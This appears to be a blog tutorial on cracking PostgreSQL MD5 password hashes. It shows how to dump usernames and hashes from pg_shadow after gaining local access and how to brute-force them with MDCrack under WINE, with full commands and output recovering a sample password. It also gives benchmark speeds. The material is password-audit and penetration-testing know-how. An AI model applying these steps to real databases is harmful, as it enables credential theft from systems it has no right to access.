Cracking Postgres Password Hashes with MDCrack

As far as I’m aware there are aren’t many good password crackers around for PostgreSQL database password hashes.  Here are a few notes on how to crack postgres password hashes quickly using MDCrack.  Even though MDCrack is a Windows program, it works well enough under WINE for our purposes.  Linux users can therefore benefit from its impressive cracking speeds.

Where are the Hashes Kept?

Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”).  First log into the database.  If you’ve gained local access to the Postgres server (e.g. via SSH), you’ll probably find that you don’t need a password to log in.  You will need a username and the name of a database, though.  The database “template1” always exists:

$ psql -U postgres template1

Then list the hashes:

# select usename, passwd from pg_shadow;
     usename      |  passwd               
------------------+-------------------------------------
 testuser         | md5fabb6d7172aadfda4753bf0507ed4396
...

The passwd field in this table is MD5(password || username) – where || denotes concatenation.   In this example the passwd field for testuser contains “md5” || MD5(m4gictestuser).

Cracking Hashes

Download the latest version of MDCrack.  If you’re running Linux, then run it under WINE.  You’ll need to tell MDCrack to append the username to the end of each candidate password:

$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

System / Starting MDCrack v1.8(3)
System / Running as MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396
System / Charset is: abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
System / Detected processor(s): 2 x unknown | 3D-Now | MMX | SSE | SSE2
System / Target hash: fabb6d7172aadfda4753bf0507ed4396
System / >> Using MD5 cores: maximal candidate/user salt size: 16/54 bytes
Info   / Press ESC for available runtime shortcuts (Ctrl-c to quit)
Info   / Thread #0: >> Using Core 2
Info   / Thread #1: >> Using Core 2
Info   / Thread #0: Candidate size:  1 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  1 ( + user salt: 8 )
Info   / Thread #0: Candidate size:  2 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  2 ( + user salt: 8 )
Info   / Thread #0: Candidate size:  3 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  3 ( + user salt: 8 )
Info   / Thread #0: Candidate size:  4 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  4 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  5 ( + user salt: 8 )
Info   / Thread #0: Candidate size:  5 ( + user salt: 8 )
----------------------------------------------------------/ Thread #0 (Success) ----
System / Thread #0: Collision found: m4gictestuser
...

Performance

When running under WINE MDCrack can rattle through nearly 20 million passwords per second on a (dual core) AMDx2 4200+.  It automatically utilises both processors.

$ wine MDCrack-sse.exe --benchmark

System / Starting MDCrack v1.8(3)
System / Running as MDCrack-sse.exe --benchmark
System / Detected processor(s): 2 x 2.15 Ghz unknown | 3D-Now | MMX | SSE | SSE2
Warning/ Please wait, this benchmark should last around 1min 45s
Info   / Press Ctrl-c to skip a test

---------------------------------------------------------------/ MD4 / DH / 2 Threads ---------------------
Info   / Benchmarking ( pass #1 )... 33 178 408 ( 3.32e+007 ) h/s.
---------------------------------------------------------------/ MD5 / DH / 2 Threads ---------------------
Info   / Benchmarking ( pass #1 )... 19 703 399 ( 1.97e+007 ) h/s.
...


Leave a Reply